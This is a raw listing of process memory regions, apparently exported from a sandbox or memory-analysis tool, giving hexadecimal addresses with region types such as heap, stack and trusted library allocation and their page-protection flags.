1D99E893000
heap
page read and write
1E9E213D000
heap
page read and write
1BFE0000
heap
page read and write
F30000
heap
page read and write
2EF8E7E000
unkown
page readonly
207DEF8E000
heap
page read and write
7FF848C30000
trusted library allocation
page execute and read and write
7FF848D40000
trusted library allocation
page read and write
207DD8F0000
trusted library allocation
page read and write
14635780000
trusted library allocation
page read and write
7FF848B3D000
trusted library allocation
page execute and read and write
7FF848B7C000
trusted library allocation
page execute and read and write
7FF848E80000
trusted library allocation
page read and write
7FF848F1C000
trusted library allocation
page read and write
1DA66574000
trusted library allocation
page read and write
207E0097000
heap
page read and write
207DEF02000
heap
page read and write
207DE3F6000
heap
page read and write
1C5EF000
stack
page read and write
1DA74E78000
trusted library allocation
page read and write
1D99F073000
heap
page read and write
207DD800000
trusted library allocation
page read and write
207DD660000
trusted library allocation
page read and write
247BD840000
heap
page read and write
207DD664000
unkown
page write copy
207DC720000
trusted library allocation
page read and write
7FF848B20000
trusted library allocation
page read and write
2BFAEB45000
trusted library allocation
page read and write
207E0364000
heap
page read and write
20025C70000
trusted library allocation
page read and write
7FF789DFD000
unkown
page read and write
F7EC7FC000
stack
page read and write
7FF848B44000
trusted library allocation
page read and write
1E9E20FD000
heap
page read and write
1C97285A000
trusted library allocation
page read and write
146302B0000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
204B74C000
stack
page read and write
1E9E2040000
heap
page readonly
B50000
heap
page read and write
201AB100000
heap
page read and write
207DE29F000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
207E0500000
heap
page read and write
207DEE7D000
heap
page read and write
C30000
heap
page read and write
201C5383000
heap
page read and write
207E0502000
heap
page read and write
7FF848DA0000
trusted library allocation
page read and write
7FF848CC0000
trusted library allocation
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
7FF789E1C000
unkown
page readonly
1D99E836000
heap
page read and write
204A77D000
stack
page read and write
1DA6308F000
heap
page read and write
1E9E6495000
heap
page read and write
F10000
heap
page read and write
1D463E10000
heap
page read and write
247BD8DC000
heap
page read and write
207DD481000
heap
page read and write
207DD8F0000
trusted library allocation
page read and write
52D1000
trusted library allocation
page read and write
247D7DDE000
heap
page read and write
207E048B000
heap
page read and write
1D99F074000
heap
page read and write
2BFB7360000
heap
page read and write
20024445000
heap
page read and write
1C3A8000
heap
page read and write
1D99E898000
heap
page read and write
1D47DFA3000
heap
page read and write
1B4E0000
heap
page read and write
7FF848CB0000
trusted library allocation
page read and write
207DC34C000
trusted library allocation
page read and write
D07A2FE000
stack
page read and write
1D4759B5000
trusted library allocation
page read and write
207DCC80000
trusted library allocation
page read and write
1CAE8000
stack
page read and write
207DD4E3000
heap
page read and write
1D47DD4E000
heap
page read and write
FBC000
heap
page read and write
1D99E8A9000
heap
page read and write
1D475971000
trusted library allocation
page read and write
F7E9FFD000
stack
page read and write
207DE389000
heap
page read and write
7FF848B22000
trusted library allocation
page read and write
204A8F9000
stack
page read and write
1C445000
heap
page read and write
1E9E6350000
heap
page read and write
207DE33B000
heap
page read and write
1DA63071000
heap
page read and write
981E6FE000
stack
page read and write
207E0104000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
204A183000
stack
page read and write
247BF47D000
trusted library allocation
page read and write
7FF848CC0000
trusted library allocation
page read and write
207D5740000
trusted library allocation
page read and write
1E9E63D3000
heap
page read and write
7FF848C30000
trusted library allocation
page execute and read and write
1AC8E6C0000
trusted library allocation
page read and write
1B6CE000
stack
page read and write
1E9E6413000
heap
page read and write
207D319D000
heap
page read and write
1D99E800000
heap
page read and write
7FF848E70000
trusted library allocation
page read and write
7FF848D20000
trusted library allocation
page read and write
1E9E20C4000
heap
page read and write
1E9E212A000
heap
page read and write
1E9E20BA000
heap
page read and write
207DCF7B000
heap
page read and write
F7EBDF8000
stack
page read and write
207E00C5000
heap
page read and write
1D99EEB9000
heap
page read and write
5E0000
heap
page read and write
207DD8C0000
heap
page read and write
14630F40000
trusted library allocation
page read and write
1D47DD3E000
heap
page read and write
7FF848B8C000
trusted library allocation
page execute and read and write
1D475941000
trusted library allocation
page read and write
2223466D000
heap
page read and write
207DCAD4000
heap
page read and write
126A8000
trusted library allocation
page read and write
207DD770000
trusted library allocation
page read and write
2BF9CD82000
unkown
page readonly
247BD912000
heap
page read and write
207DE560000
trusted library allocation
page read and write
200277B3000
trusted library allocation
page read and write
9C6E90A000
stack
page read and write
1D463CB0000
heap
page read and write
2BF9CEA1000
heap
page read and write
1D99EA85000
heap
page read and write
9CA86FE000
stack
page read and write
52A0000
trusted library allocation
page read and write
1DA7D426000
heap
page read and write
F80000
heap
page read and write
1D99EF53000
heap
page read and write
207DCDE0000
trusted library allocation
page read and write
CF1000
stack
page read and write
5B6E2F7000
stack
page read and write
F7E9AF9000
stack
page read and write
207D0D11000
heap
page read and write
207DDFC2000
unkown
page readonly
207DEF42000
heap
page read and write
7FF6373FA000
unkown
page readonly
14635790000
trusted library allocation
page read and write
548C000
trusted library allocation
page read and write
207DE368000
heap
page read and write
1D99EEEC000
heap
page read and write
20025D9C000
heap
page read and write
207DD4D8000
heap
page read and write
14630B13000
heap
page read and write
B90000
unkown
page readonly
1D99E84D000
heap
page read and write
EF1000
stack
page read and write
1DA65EC8000
trusted library allocation
page read and write
247BF479000
trusted library allocation
page read and write
1D475C2E000
trusted library allocation
page read and write
7FF848D00000
trusted library allocation
page read and write
14635854000
heap
page read and write
201AAFC2000
heap
page read and write
1C471000
heap
page read and write
1C9724E8000
heap
page read and write
7FF848CC0000
trusted library allocation
page read and write
F7E9DFC000
stack
page read and write
9CA8392000
stack
page read and write
7FF848D80000
trusted library allocation
page read and write
2EF907E000
unkown
page readonly
5305000
trusted library allocation
page read and write
F7EAEFA000
stack
page read and write
1D99E770000
heap
page read and write
1E9E42B3000
heap
page read and write
14635720000
trusted library allocation
page read and write
207DD7AC000
unkown
page readonly
146358C8000
heap
page read and write
F7ED6FD000
stack
page read and write
9CA877E000
stack
page read and write
207E0203000
heap
page read and write
207DE36A000
heap
page read and write
1D99EA85000
heap
page read and write
207DC9C0000
trusted library allocation
page read and write
146302BD000
heap
page read and write
1E9E6495000
heap
page read and write
1D47DEE7000
heap
page read and write
20027D45000
trusted library allocation
page read and write
C10000
heap
page read and write
207DC646000
unkown
page readonly
2003E260000
heap
page read and write
1DA7D11E000
heap
page read and write
1AC8E64E000
trusted library allocation
page read and write
7FF848BC6000
trusted library allocation
page read and write
F7EC8F7000
stack
page read and write
766000
unkown
page readonly
207DE3D5000
heap
page read and write
201AAFB0000
heap
page read and write
207DEF9D000
heap
page read and write
7FF848BC0000
trusted library allocation
page read and write
1D466538000
trusted library allocation
page read and write
1C9742E0000
heap
page read and write
207DE540000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page read and write
7FF848B44000
trusted library allocation
page read and write
201ADDAA000
trusted library allocation
page read and write
1D99E895000
heap
page read and write
2EF7D7E000
unkown
page readonly
7FF848BD0000
trusted library allocation
page read and write
207E0445000
heap
page read and write
207D0DC1000
heap
page read and write
207DE326000
heap
page read and write
7FF848B6C000
trusted library allocation
page execute and read and write
207DD806000
unkown
page readonly
1D465773000
heap
page read and write
5460000
trusted library allocation
page read and write
1C97252B000
heap
page read and write
1E9E20FB000
heap
page read and write
207DEFD1000
heap
page read and write
1B4D0000
heap
page read and write
207DCF02000
heap
page read and write
1D99F041000
heap
page read and write
207E0294000
heap
page read and write
7FF848B10000
trusted library allocation
page read and write
201AE3F4000
trusted library allocation
page read and write
1D99E89F000
heap
page read and write
52F4000
trusted library allocation
page read and write
1B5EE000
stack
page read and write
207E01B4000
heap
page read and write
207DD7A0000
unkown
page read and write
7FF848D60000
trusted library allocation
page execute and read and write
107B000
heap
page read and write
1D99EA58000
heap
page read and write
1D99E828000
heap
page read and write
C83000
heap
page read and write
207DA980000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page read and write
207DE572000
unkown
page execute read
20025CA6000
heap
page execute and read and write
201C4F6A000
heap
page read and write
207DCFED000
heap
page read and write
207D0C13000
heap
page read and write
1D99EECA000
heap
page read and write
9E9000
heap
page read and write
7FF848D34000
trusted library allocation
page read and write
1C41A000
heap
page read and write
207DC37D000
trusted library allocation
page read and write
201C5220000
heap
page read and write
7FF848F70000
trusted library allocation
page read and write
590000
heap
page read and write
20026972000
trusted library allocation
page read and write
1D475C34000
trusted library allocation
page read and write
247D7D10000
heap
page execute and read and write
207E0200000
heap
page read and write
7FF848C50000
trusted library allocation
page execute and read and write
1D475C3C000
trusted library allocation
page read and write
207DCDD0000
heap
page read and write
201C4FDE000
heap
page read and write
1D99E990000
heap
page read and write
F7EA0FF000
stack
page read and write
7FF848EF0000
trusted library allocation
page read and write
7FF848B13000
trusted library allocation
page execute and read and write
204B6C9000
stack
page read and write
207DD680000
trusted library allocation
page read and write
20026E9A000
trusted library allocation
page read and write
1D99EEBA000
heap
page read and write
210D3B40000
heap
page read and write
1D4671AD000
trusted library allocation
page read and write
1D99EA06000
heap
page read and write
F7EABFA000
stack
page read and write
1D99F0A4000
heap
page read and write
1DA6307D000
heap
page read and write
1AC8E62A000
trusted library allocation
page read and write
26B1000
trusted library allocation
page read and write
2003E7D0000
heap
page read and write
BAB5DFD000
stack
page read and write
207D5D66000
heap
page read and write
207D31C3000
heap
page read and write
5B6F18E000
stack
page read and write
207DC330000
trusted library allocation
page read and write
2EF867B000
stack
page read and write
7FF848B2D000
trusted library allocation
page execute and read and write
1D99EA62000
heap
page read and write
7FF848CBA000
trusted library allocation
page read and write
1BACE000
stack
page read and write
1E9E3FE0000
trusted library allocation
page read and write
A0F000
heap
page read and write
207DC710000
trusted library allocation
page read and write
210D3E10000
heap
page read and write
201ACFCD000
trusted library allocation
page read and write
207DC7CE000
unkown
page read and write
207DE590000
trusted library allocation
page read and write
7FF848B50000
trusted library allocation
page read and write
5B6E5B9000
stack
page read and write
1240000
heap
page read and write
207DDF90000
heap
page read and write
207DEF90000
heap
page read and write
C85000
heap
page read and write
1D99E88B000
heap
page read and write
207E04B8000
heap
page read and write
7FF848BBC000
trusted library allocation
page execute and read and write
FE5000
heap
page read and write
1C97254B000
heap
page read and write
1D47DD1F000
heap
page read and write
207E0302000
heap
page read and write
1D99E9F3000
heap
page read and write
20024390000
heap
page read and write
12E3D000
trusted library allocation
page read and write
2691000
trusted library allocation
page read and write
1D99E7D0000
heap
page read and write
222345FE000
heap
page read and write
1DA65BBD000
trusted library allocation
page read and write
207DE313000
heap
page read and write
D142A79000
stack
page read and write
2003E7B3000
heap
page read and write
207DEC1E000
unkown
page readonly
207DD5EF000
heap
page read and write
B11000
stack
page read and write
21EF5D5000
stack
page read and write
1C396000
heap
page read and write
1D466A69000
trusted library allocation
page read and write
207D5D32000
heap
page read and write
1D47DDC7000
heap
page read and write
1D99EE41000
heap
page read and write
200242E0000
heap
page read and write
207DE362000
heap
page read and write
7FF848C40000
trusted library allocation
page execute and read and write
1E9E20BB000
heap
page read and write
207D31DD000
heap
page read and write
12A92000
trusted library allocation
page read and write
2BF9CE9F000
heap
page read and write
207DE3D7000
heap
page read and write
207E0462000
heap
page read and write
1D99E9F4000
heap
page read and write
1D99EE40000
heap
page read and write
207D5AC8000
trusted library allocation
page read and write
1D99F0C6000
heap
page read and write
2EF997E000
unkown
page readonly
201C5110000
heap
page execute and read and write
1D467746000
trusted library allocation
page read and write
7FF848BDC000
trusted library allocation
page execute and read and write
7FF848F10000
trusted library allocation
page execute and read and write
1D99F050000
heap
page read and write
1D47DCE2000
heap
page read and write
294F000
trusted library allocation
page read and write
207D0CBE000
heap
page read and write
207DDC26000
heap
page read and write
7FF848AF0000
trusted library allocation
page read and write
5B6DDF3000
stack
page read and write
7FF848D60000
trusted library allocation
page read and write
1BFE4000
heap
page read and write
7FF848B33000
trusted library allocation
page execute and read and write
247BD99E000
heap
page read and write
1D99EA28000
heap
page read and write
F7E98FE000
stack
page read and write
200243AE000
heap
page read and write
1AC8E63E000
trusted library allocation
page read and write
200243D6000
heap
page read and write
207DCFC7000
heap
page read and write
7FF6373EB000
unkown
page read and write
1D463E14000
heap
page read and write
1B8CE000
stack
page read and write
4AE3000
trusted library allocation
page read and write
14635810000
trusted library allocation
page read and write
9CA994D000
stack
page read and write
12E11000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1DA7D0AC000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
1DA63340000
trusted library allocation
page read and write
1E9E3DE0000
heap
page read and write
1E9E211E000
heap
page read and write
C4BEEFE000
stack
page read and write
207D0DCF000
heap
page read and write
5B6E07E000
stack
page read and write
1D99E864000
heap
page read and write
1D99EFF0000
heap
page read and write
207DD8F0000
trusted library allocation
page read and write
1DA7D320000
heap
page read and write
207DE584000
unkown
page execute read
1D47DCB8000
heap
page read and write
2EF92FE000
stack
page read and write
1D99EF77000
heap
page read and write
9CA87F9000
stack
page read and write
7FF848B2A000
trusted library allocation
page read and write
1E9E4232000
heap
page read and write
1C41C000
heap
page read and write
22234679000
heap
page read and write
207DEF82000
heap
page read and write
F7ED0F8000
stack
page read and write
207DEC10000
unkown
page readonly
780000
heap
page read and write
1D4656D0000
heap
page execute and read and write
207D5D7C000
heap
page read and write
207D3100000
heap
page read and write
E29000
heap
page read and write
207DE2A2000
heap
page read and write
207DD8F0000
trusted library allocation
page read and write
207DC6A8000
unkown
page readonly
207DC6C0000
trusted library allocation
page read and write
207DC37E000
trusted library allocation
page read and write
20027D00000
trusted library allocation
page read and write
2BF9CD80000
unkown
page readonly
1D99E8A9000
heap
page read and write
207DC7CC000
unkown
page readonly
F7ED8FF000
stack
page read and write
1DA63055000
heap
page read and write
200263ED000
trusted library allocation
page read and write
207E0343000
heap
page read and write
7FF848D50000
trusted library allocation
page read and write
1D99E807000
heap
page read and write
7FF848B24000
trusted library allocation
page read and write
1E9E212A000
heap
page read and write
1D47E008000
heap
page read and write
1E9E20C2000
heap
page read and write
207D5E00000
trusted library section
page readonly
7FF848B12000
trusted library allocation
page read and write
7FF848F70000
trusted library allocation
page read and write
14630B1B000
heap
page read and write
532D000
trusted library allocation
page read and write
1D99EFDF000
heap
page read and write
1AC8E6C4000
trusted library allocation
page read and write
BAB57FE000
stack
page read and write
1D99E89C000
heap
page read and write
204B64E000
stack
page read and write
C4BF7FE000
stack
page read and write
1D99EE96000
heap
page read and write
1DA63077000
heap
page read and write
207DE155000
heap
page read and write
4F4573C000
stack
page read and write
201AB184000
heap
page read and write
9CA984E000
stack
page read and write
2EF807C000
stack
page read and write
251E000
stack
page read and write
7DF462770000
trusted library allocation
page execute and read and write
1E9E20DF000
heap
page read and write
9C6F5FB000
stack
page read and write
207DD76A000
unkown
page readonly
207DDFD0000
heap
page read and write
1DA7D214000
heap
page read and write
7FF848D10000
trusted library allocation
page read and write
207DCA72000
heap
page read and write
1DA7D12E000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
1D99EF66000
heap
page read and write
20026B1D000
trusted library allocation
page read and write
1D99E89F000
heap
page read and write
1C46E000
heap
page read and write
2003E650000
heap
page read and write
222345DA000
heap
page read and write
207DDD23000
heap
page read and write
201AE36B000
trusted library allocation
page read and write
7FF848C30000
trusted library allocation
page execute and read and write
ED0000
trusted library allocation
page read and write
F35000
heap
page read and write
2003E77C000
heap
page read and write
207DEEA3000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
1D99E89F000
heap
page read and write
1D99EF22000
heap
page read and write
207D0DAA000
heap
page read and write
2002438E000
heap
page read and write
200277B8000
trusted library allocation
page read and write
1C972531000
heap
page read and write
207D3153000
heap
page read and write
5395000
trusted library allocation
page read and write
201AB0B0000
heap
page read and write
207DCBA5000
heap
page read and write
1463590E000
heap
page read and write
1D99E80D000
heap
page read and write
BE0000
trusted library allocation
page read and write
9E8000
heap
page read and write
1E9E40EE000
heap
page read and write
7FF848B14000
trusted library allocation
page read and write
7FF848B12000
trusted library allocation
page read and write
1D99E9E1000
heap
page read and write
1AC8C9D0000
heap
page read and write
1D99E8A6000
heap
page read and write
7FF848E90000
trusted library allocation
page read and write
7FF848B20000
trusted library allocation
page read and write
201C523C000
heap
page read and write
1D99E89F000
heap
page read and write
21EF5D0000
stack
page read and write
1DA632C0000
trusted library allocation
page read and write
207D26C0000
trusted library allocation
page read and write
1E9E6495000
heap
page read and write
C4BF1FC000
stack
page read and write
7FF848B10000
trusted library allocation
page read and write
A73000
heap
page read and write
207DE22C000
heap
page read and write
207DE3C9000
heap
page read and write
7FF848CD4000
trusted library allocation
page read and write
2BF9CE60000
heap
page read and write
1DA7D4A0000
heap
page read and write
268F000
stack
page read and write
1E5E4000
heap
page read and write
7FF848BD0000
trusted library allocation
page execute and read and write
7FF848DE0000
trusted library allocation
page read and write
1D99EF65000
heap
page read and write
F7EBCFD000
stack
page read and write
207D5AA0000
trusted library allocation
page read and write
1D99E8A9000
heap
page read and write
1D99EA61000
heap
page read and write
1E9E2265000
heap
page read and write
207DC620000
unkown
page readonly
F7EC0FB000
stack
page read and write
14635A00000
trusted library allocation
page read and write
7FF848E69000
trusted library allocation
page read and write
207DCF02000
heap
page read and write
52D3000
trusted library allocation
page read and write
247BF491000
trusted library allocation
page read and write
207E0023000
heap
page read and write
E20000
heap
page read and write
F7EB1FD000
stack
page read and write
207E04CA000
heap
page read and write
2930000
heap
page read and write
14630240000
heap
page read and write
207E0202000
heap
page read and write
D079F79000
stack
page read and write
207DDC34000
heap
page read and write
146312A0000
trusted library section
page readonly
C60000
heap
page read and write
14635780000
trusted library allocation
page read and write
201C527E000
heap
page read and write
1DA74E7E000
trusted library allocation
page read and write
1D99F0D8000
heap
page read and write
207DD804000
unkown
page read and write
1C9725B9000
heap
page read and write
7FF848B5C000
trusted library allocation
page execute and read and write
1DA65BC5000
trusted library allocation
page read and write
981E9FE000
stack
page read and write
207E0212000
heap
page read and write
1D99EEFE000
heap
page read and write
1C972527000
heap
page read and write
207DCCF0000
heap
page read and write
BAB59FF000
stack
page read and write
1B460000
trusted library section
page read and write
7FF848E72000
trusted library allocation
page read and write
7FF848BDC000
trusted library allocation
page execute and read and write
204A47E000
stack
page read and write
21EF8FE000
stack
page read and write
207DE26A000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
1C97254F000
heap
page read and write
1DA65C52000
trusted library allocation
page read and write
207DD49D000
heap
page read and write
7FF848B14000
trusted library allocation
page read and write
2BF9D220000
heap
page read and write
204A1CE000
stack
page read and write
201AE391000
trusted library allocation
page read and write
1D99E9A2000
heap
page read and write
7FF848CDA000
trusted library allocation
page read and write
1DA7D160000
heap
page read and write
2BF9CD86000
unkown
page readonly
7FF848B24000
trusted library allocation
page read and write
2DBC000
trusted library allocation
page read and write
2EF847B000
stack
page read and write
207E04C0000
heap
page read and write
12E18000
trusted library allocation
page read and write
1D46776B000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
1D99EF89000
heap
page read and write
207DD7F6000
unkown
page write copy
22236014000
heap
page read and write
1DA4B000
stack
page read and write
201C52F5000
heap
page read and write
1D99E9D5000
heap
page read and write
1C379000
heap
page read and write
2941000
trusted library allocation
page read and write
EC0000
heap
page read and write
1D99F081000
heap
page read and write
1D99EA06000
heap
page read and write
1E9E211A000
heap
page read and write
1D47DD4A000
heap
page read and write
12E0F000
trusted library allocation
page read and write
22234679000
heap
page read and write
247BD6F0000
unkown
page readonly
5464000
trusted library allocation
page read and write
207DE3EA000
heap
page read and write
1DA65BED000
trusted library allocation
page read and write
1D99EEEE000
heap
page read and write
1D737000
stack
page read and write
1D475CEA000
trusted library allocation
page read and write
F7EA7FB000
stack
page read and write
2BFAEB47000
trusted library allocation
page read and write
FA0000
heap
page read and write
2850000
heap
page read and write
207DE700000
heap
page read and write
20027D4A000
trusted library allocation
page read and write
1D99EA60000
heap
page read and write
200243D4000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
7FF848B2D000
trusted library allocation
page execute and read and write
1D467766000
trusted library allocation
page read and write
2BF9CECC000
heap
page read and write
7FF848D10000
trusted library allocation
page read and write
ECF000
stack
page read and write
207DCC72000
unkown
page readonly
1D4659C7000
trusted library allocation
page read and write
207DDC03000
heap
page read and write
5B6E7BB000
stack
page read and write
207D31AA000
heap
page read and write
207DCAA6000
heap
page read and write
207DD660000
trusted library allocation
page read and write
207DEF00000
heap
page read and write
1DA7D32B000
heap
page read and write
5397000
trusted library allocation
page read and write
146356A0000
trusted library allocation
page read and write
201AAFFC000
heap
page read and write
207D0B90000
heap
page read and write
207DD8A0000
unkown
page readonly
207D5D2A000
heap
page read and write
7FF848D04000
trusted library allocation
page read and write
146358E8000
heap
page read and write
7DF423721000
trusted library allocation
page execute read
207E0402000
heap
page read and write
4F44CFE000
stack
page read and write
1DA633A0000
heap
page read and write
1AC8E560000
trusted library allocation
page read and write
7FF848BC6000
trusted library allocation
page read and write
7FF848D00000
trusted library allocation
page read and write
1DA65BC3000
trusted library allocation
page read and write
201BCB31000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
247BF4DE000
trusted library allocation
page read and write
7FF848BD0000
trusted library allocation
page execute and read and write
2690000
heap
page execute and read and write
14630222000
heap
page read and write
1D99EF9A000
heap
page read and write
2003E7A7000
heap
page read and write
207D0C4D000
heap
page read and write
7FF848BE0000
trusted library allocation
page execute and read and write
1D99EFCE000
heap
page read and write
207DD7F0000
trusted library allocation
page read and write
7FF848CC0000
trusted library allocation
page execute and read and write
4D84000
trusted library allocation
page read and write
20027874000
trusted library allocation
page read and write
207DCF3E000
heap
page read and write
1C974631000
heap
page read and write
1AC8CA60000
heap
page read and write
207DCB28000
heap
page read and write
14630B02000
heap
page read and write
1D465B69000
trusted library allocation
page read and write
A47000
heap
page read and write
1B43E000
stack
page read and write
146312C0000
trusted library section
page readonly
1D463CFB000
heap
page read and write
7FF848B24000
trusted library allocation
page read and write
7FF637391000
unkown
page execute read
12A71000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page read and write
207DCF5E000
heap
page read and write
1D99EA85000
heap
page read and write
1D99EF54000
heap
page read and write
1C97255B000
heap
page read and write
207DD8F0000
trusted library allocation
page read and write
1AC8CBE0000
heap
page read and write
F7EC4FA000
stack
page read and write
1D99EFBC000
heap
page read and write
5393000
trusted library allocation
page read and write
207DCF95000
heap
page read and write
CC5000
heap
page read and write
7FF848B40000
trusted library allocation
page read and write
F7EB3FE000
stack
page read and write
7FF848E43000
trusted library allocation
page read and write
1D99E89F000
heap
page read and write
207E01A4000
heap
page read and write
1DA66A25000
trusted library allocation
page read and write
1E9E6495000
heap
page read and write
1D466972000
trusted library allocation
page read and write
1D463C50000
heap
page read and write
7FF848BC0000
trusted library allocation
page read and write
1DA63304000
heap
page read and write
1B704000
heap
page read and write
207DE3D5000
heap
page read and write
2A71000
trusted library allocation
page read and write
207DE16A000
heap
page read and write
1D99F060000
heap
page read and write
222345E6000
heap
page read and write
7FF848B34000
trusted library allocation
page read and write
207DC62A000
unkown
page readonly
1D99EA06000
heap
page read and write
146356D0000
trusted library allocation
page read and write
5365000
trusted library allocation
page read and write
207DDFE0000
heap
page read and write
53CC000
trusted library allocation
page read and write
7FF848E88000
trusted library allocation
page read and write
7DF4AA8C0000
trusted library allocation
page execute and read and write
D07A17E000
stack
page read and write
7FF848CC1000
trusted library allocation
page read and write
7FF848E74000
trusted library allocation
page read and write
1D99EA17000
heap
page read and write
1E9E20AB000
heap
page read and write
1D463CED000
heap
page read and write
207DEE47000
heap
page read and write
EC5000
heap
page read and write
BAB66FC000
stack
page read and write
9C6ECFF000
stack
page read and write
207DC9F0000
trusted library allocation
page read and write
2002704F000
trusted library allocation
page read and write
FEF000
heap
page read and write
207DCCA0000
trusted library allocation
page read and write
C68000
heap
page read and write
14635905000
heap
page read and write
247BD890000
heap
page read and write
11A0000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
7FF848CC6000
trusted library allocation
page read and write
9D7000
heap
page read and write
1D99E7E6000
heap
page read and write
7FF848E33000
trusted library allocation
page read and write
207DE761000
heap
page read and write
207DE3EF000
heap
page read and write
2BF9CF1B000
heap
page read and write
1DA6648C000
trusted library allocation
page read and write
1D99EE75000
heap
page read and write
207DCDE0000
trusted library allocation
page read and write
AA7000
heap
page read and write
7FF848D50000
trusted library allocation
page read and write
1B9CF000
stack
page read and write
7FF848BCC000
trusted library allocation
page execute and read and write
7FF848BD6000
trusted library allocation
page execute and read and write
207DD792000
unkown
page readonly
1D99E7C1000
heap
page read and write
1D99E895000
heap
page read and write
7FF6373FF000
unkown
page readonly
C4BF3FA000
stack
page read and write
201ADCDC000
trusted library allocation
page read and write
1E9E6351000
heap
page read and write
3EC9000
trusted library allocation
page read and write
2003E28B000
heap
page read and write
269C000
trusted library allocation
page read and write
20025F10000
heap
page execute and read and write
7FF789DB0000
unkown
page readonly
51F9000
trusted library allocation
page read and write
5333000
trusted library allocation
page read and write
7FF848D00000
trusted library allocation
page read and write
207DEF9D000
heap
page read and write
20026E85000
trusted library allocation
page read and write
20025C50000
trusted library allocation
page read and write
207DCCA0000
unkown
page readonly
207E007D000
heap
page read and write
207D0DE7000
heap
page read and write
207DEF02000
heap
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
C0B000
heap
page read and write
1D99EA7E000
heap
page read and write
1D466C1C000
trusted library allocation
page read and write
207E0284000
heap
page read and write
1E9E2070000
heap
page read and write
7FF848F7D000
trusted library allocation
page read and write
1DA74F0E000
trusted library allocation
page read and write
207DC610000
unkown
page readonly
9CA867E000
stack
page read and write
207DD50C000
heap
page read and write
514A000
trusted library allocation
page read and write
201AD706000
trusted library allocation
page read and write
207D315A000
heap
page read and write
207D0DDE000
heap
page read and write
7FF789E1C000
unkown
page readonly
1E9E6414000
heap
page read and write
1C97255E000
heap
page read and write
1E9E42B3000
heap
page read and write
207E0103000
heap
page read and write
2BF9EB41000
trusted library allocation
page read and write
F7ED3FD000
stack
page read and write
7DF4A2050000
trusted library allocation
page execute and read and write
207D3002000
heap
page read and write
1D463C30000
heap
page read and write
207D0DCA000
heap
page read and write
1DA66A00000
trusted library allocation
page read and write
1D99F0D8000
heap
page read and write
1D99E7FB000
heap
page read and write
247BD90F000
heap
page read and write
126A1000
trusted library allocation
page read and write
1D99E7C4000
heap
page read and write
20025C30000
trusted library allocation
page read and write
1DA7D0CF000
heap
page read and write
1DA7D6B0000
heap
page read and write
4F44BFF000
stack
page read and write
14630A02000
heap
page read and write
1CF2A000
stack
page read and write
1E5D0000
heap
page read and write
7FF848B24000
trusted library allocation
page read and write
1D99E991000
heap
page read and write
207D0DE2000
heap
page read and write
1AC8C9F0000
heap
page read and write
7FF848B3D000
trusted library allocation
page execute and read and write
1C974270000
heap
page read and write
2A60000
heap
page execute and read and write
5390000
trusted library allocation
page read and write
207DCCE0000
trusted library allocation
page read and write
1D99EE62000
heap
page read and write
F7EB5FE000
stack
page read and write
207DE29B000
heap
page read and write
207DCF14000
heap
page read and write
207DE34B000
heap
page read and write
9CA8C7E000
stack
page read and write
7FF848D50000
trusted library allocation
page read and write
2EF937E000
unkown
page readonly
2EF8DFE000
stack
page read and write
1D463CF1000
heap
page read and write
5B6E27E000
stack
page read and write
5960AFF000
stack
page read and write
1DA6306C000
heap
page read and write
7FF848B4B000
trusted library allocation
page execute and read and write
C4BF0FD000
stack
page read and write
1463025B000
heap
page read and write
200245E0000
heap
page read and write
D10000
heap
page read and write
7FF848BE0000
trusted library allocation
page read and write
207DDC22000
heap
page read and write
1E9E41F0000
heap
page read and write
207DEE3B000
heap
page read and write
7FF848BC0000
trusted library allocation
page read and write
247BDAB0000
trusted library allocation
page read and write
207DE6D8000
heap
page read and write
1E9E419B000
heap
page read and write
1BA8E000
stack
page read and write
EDC000
heap
page read and write
2A3E000
stack
page read and write
7FF848B44000
trusted library allocation
page read and write
207D0DFC000
heap
page read and write
207D319F000
heap
page read and write
207D9E90000
trusted library allocation
page read and write
207DC612000
unkown
page readonly
F03000
trusted library allocation
page read and write
9EF000
heap
page read and write
1D99E872000
heap
page read and write
207DCFD5000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
20024340000
trusted library section
page read and write
207D26D0000
trusted library allocation
page read and write
207DCDFC000
unkown
page write copy
2EF897E000
unkown
page readonly
9CA8BFE000
stack
page read and write
1E9E3FE9000
heap
page read and write
2BF9EB4A000
trusted library allocation
page read and write
1D47DFED000
heap
page read and write
1E9E2050000
heap
page read and write
1DA74C51000
trusted library allocation
page read and write
207DC338000
trusted library allocation
page read and write
1DA65CE2000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
2EF8A7E000
unkown
page readonly
1B1EF000
stack
page read and write
7FF848F50000
trusted library allocation
page read and write
201C52F7000
heap
page read and write
107D000
heap
page read and write
1AC9E55D000
trusted library allocation
page read and write
1D99EF65000
heap
page read and write
20025F21000
trusted library allocation
page read and write
207DCB7D000
heap
page read and write
7FF848CA0000
trusted library allocation
page read and write
247BF433000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
1D465930000
heap
page execute and read and write
1DA65818000
trusted library allocation
page read and write
201C5050000
trusted library allocation
page read and write
247BDB60000
heap
page read and write
201BCB74000
trusted library allocation
page read and write
294C000
trusted library allocation
page read and write
207DCCE0000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page read and write
201C5276000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
9CA83DF000
stack
page read and write
7FF789DB1000
unkown
page execute read
1E9E226E000
heap
page read and write
981EBFB000
stack
page read and write
1DA632F0000
heap
page readonly
1D466BED000
trusted library allocation
page read and write
1DA632E0000
trusted library allocation
page read and write
207DEF02000
heap
page read and write
7FF789DEB000
unkown
page readonly
207DE35A000
heap
